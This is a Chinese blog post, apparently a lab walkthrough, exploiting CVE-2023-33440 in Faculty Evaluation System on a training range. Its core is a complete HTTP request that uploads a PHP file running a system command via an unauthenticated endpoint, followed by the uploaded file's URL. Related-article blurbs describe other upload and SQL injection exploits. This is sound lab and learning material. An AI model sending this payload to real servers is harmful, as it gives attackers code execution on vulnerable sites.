春秋云镜CVE-2023-33440

于 2024-08-07 19:51:52 发布
阅读量185 收藏 1
点赞数 2
文章标签: android
阿迪
本文链接:https://blog.csdn.net/2201_75569982/article/details/140999889
版权

打开靶场

目录扫描

发现后台login.php,进入查看

弱口令进行测试,无效,无法进入

根据提示是未授权访问文件上传 ,应该是不需要登录就能触发漏洞的,直接进行抓包

poc如下

# 看到介绍说是未受权上传,大概应该是不用登录就能有漏洞,那么我们直接用burp抓包
# 然后我们搞一个poc
POST /ajax.php?action=update_user HTTP/1.1
Host: XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://XXX/index.php?page=report
Content-Length: 750
Content-Type: multipart/form-data; boundary=---------------------------166782539326470
Connection: close
 
-----------------------------166782539326470
Content-Disposition: form-data; name="id"
 
1
-----------------------------166782539326470
Content-Disposition: form-data; name="firstname"
 
Administrator
-----------------------------166782539326470
Content-Disposition: form-data; name="lastname"
 
a
-----------------------------166782539326470
Content-Disposition: form-data; name="email"
 
admin@admin.com
-----------------------------166782539326470
Content-Disposition: form-data; name="password"
 
admin
-----------------------------166782539326470
Content-Disposition: form-data; name="img"; filename="php.php"
Content-Type: application/octet-stream
 
<?php system("cat /flag");?>
-----------------------------166782539326470--

需要注意poc里面的域名得换成我们自己的,如下图 第二张图需要把前面所有的空格删掉,不然不会回显

# 我们直接访问
http://eci-2ze6jxmafd8fdczabvrs.cloudeci1.ichunqiu.com/assets/uploads/1723030980_php.php

Ad
关注
ECTouch 电商微信小程序 SQL注入漏洞复现(CVE-2023-39560)
0xSec
01-20 784
ECTouch 电商系统 /ectouch-main/include/apps/default/helpers/insert.php 文件中第285行的 insert_bought_notes 函数中,传入的 $arr['id'] 参数未进行验证和过滤,导致未经身份验证的攻击者利用该漏洞进行SQL注入,获取数据库敏感信息。
CVE-2023-33440(任意文件上传)
热门推荐
Battery的博客
07-20 2万+
Faculty Evaluation System v1.0 存在未授权任意文件上传漏洞漏洞。
CVE-2023-33440~文件上传【春秋境靶场渗透】
weixin_67832625的博客
08-04 591
主要是因为靶场资源较少,发一篇避坑教程~~~
CVE-2023-33440详解
最新发布
a666666688的博客
08-05 462
【代码】CVE-2023-33440
春秋云镜】Faculty Evaluation System未授权任意文件上传漏洞(CVE-2023-33440)
shelbytt的博客
06-12 627
登录邮箱不知道 一般是 admin@admin.com/admin 尝试无果,根据提示是未授权访问文件上传 ,应该不需要登录就能触发漏洞的,看了些漏洞介绍,直接burp suite抓包。因为该靶场没有Write up,索性自己搞一下,方便别人,快乐自己!随便点都没啥东西,索性拿工具扫描下敏感路径。访问shell 地址,拿到flag。只修改IP即可,发包即可上传成功。
monstra 文件上传(CVE-2020-13384)
m0_65150886的博客
01-02 639
Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。6.编写test.phar文件。4.跳转到登录页面,随意注册。2.进行注册,随意填写就好。输入注册的用户名密码登录。1.访问ip:port。3.注册成功,点击登录。
春秋CVE-2022-4230 夺旗
05-02
### 春秋CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋云镜CVE-2023-38836
06-15
很抱歉,由于安全性和隐私保护原则,我无法提供详细的CVE(Common Vulnerabilities and Exposures)报告或漏洞分析,尤其是对于特定的漏洞如春秋云镜CVE-2023-38836。CVE是一个由美国国家网络安全中心维护的系统,...
[春秋云镜]CVE-2022-26965 XStream Pluck-CMS-Pluck-4.7.16 后台RCE
b1n的博客
08-23 509
Pluck-CMS-Pluck-4.7.16 后台RCE。
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
empirecms 文件上传 (CVE-2018-18086)
weixin_63124284的博客
10-03 872
EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。EmpireCMS7.5版本中的/e/class/moddofun.php文件的”LoadInMod”函数存在安全漏洞,攻击者可利用该漏洞上传任意文件。
Weaver E-Office v9.5 文件上传漏洞(CVE-2023-2648)
Flag少侠的博客
06-19 8052
CVE-2023-2648 是一个在 Weaver E-Office 9.5 版本中发现的严重漏洞。此漏洞位于文件中,通过操控Filedata参数,可以进行不受限制的文件上传。这一漏洞允许攻击者上传可能包含危险类型的文件,并在应用程序环境中执行。该漏洞可以通过远程发起攻击,且已被公开披露,构成了严重的安全风险。此漏洞被分类为 CWE-434:不受限制的危险类型文件上传。根据 CVSS v3.1 评分,此漏洞的基本评分为 9.8,表明其严重性极高。
Dolibarr 文件上传漏洞(CVE-2020-14209)
玄道的网安博客
12-18 835
简介 Dolibarr ERP&CRM是一个现代软件包,可帮助管理组织的活动(联系人,供应商,发票,订单,库存,议程等)。 这是一个开放源代码软件套件(用PHP编写,具有可选的JavaScript增强功能),适合中小型或大型公司,基金会和自由职业者使用。 漏洞概述 该漏洞允许低权权用户上传危险文件,从而导致任意代码执行。 影响版本 Dolibarr 11.0.5之前版本存在安全漏洞 环境搭建 到GitHub上下载源码 https://github.com/Dolibarr/dolibarr
EmpireCMS文件上传(CVE-2018-18086)
m0_65150886的博客
02-20 457
EmpireCMS7.5及之前版本中的admindbDoSql.php文件存在代码注入漏洞。该漏洞源于外部输入数据构造代码段的过程中,网路系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞生成非法的代码段,修改网络系统或组件的预期的执行控制流。6.上传该文件(数据表名随意填写,我这里填写的是php),点击马上导入。1.访问http://ip:port,出现如下页面,开始实验。4.点击系统,数据表与系统模型,管理数据表,导入系统模型。7.访问上传的getshell文件。2.访问管理员登录界面。
春秋境 | 文件上传 | CVE-2022-29464
weixin_68416970的博客
08-04 703
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
KindEditor文件上传漏洞(CVE-2018-18950)
m0_65150886的博客
01-03 2417
漏洞存在于小于等于kindeditor4.1.5 编辑器里,你能上传.txt和 .html文件,支持php/asp/jsp/asp.net。/php/upload_json.php文件不会清理用户输入或者检查用户是否将任意文件上传到系统。通过构造一个恶意的 html文件来实现跳转,钓鱼等,恶意攻击者可实现。1.直接删除upload_json.和file_manager_json.即可。​​​​​​​6.访问html文件如下。7.抓包,上传txt文件,获取返回路径。8.访问上传文件,发现成功上传。
phpok 文件上传漏洞(CVE-2018-12491)
xy_wjyjw的博客
10-30 140
查看文件地址(http://10.9.47.6:20282/res/soft/2023/eff0d264f890cff.php)访问管理员后台,输入url地址(10.9.47.6:20282/admin.php)选择添加文件,内容管理——资讯中心——行业新闻中的加号——选择图片。打开虚拟终端,输入命令dir /tmp,查看flag。在压缩文件中的支持的附件类型中加入php,点击提交。点击进入管理员后台,点击工具——附件分类管理。用蚁剑连接,提示连接成功。选择图片的类型压缩文件。点击yjh.php查看。
【文件上传】---内容、解析漏洞、CVE---day22
weixin_45807596的博客
05-17 22
【文件上传】---内容、解析漏洞、CVE---day22 一、upload-lab案例演示 1、Pass-14---图片马、文件包含、文件头 ①页面 ②操作方法---生成图片马 用到的工具:https://github.com/fofapro/fofa_view 下载后解压,创建一个图片文件,和一个php一句话木马文件。 使用如下命令:生成图片马 copy 1.jpg /b + shell....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值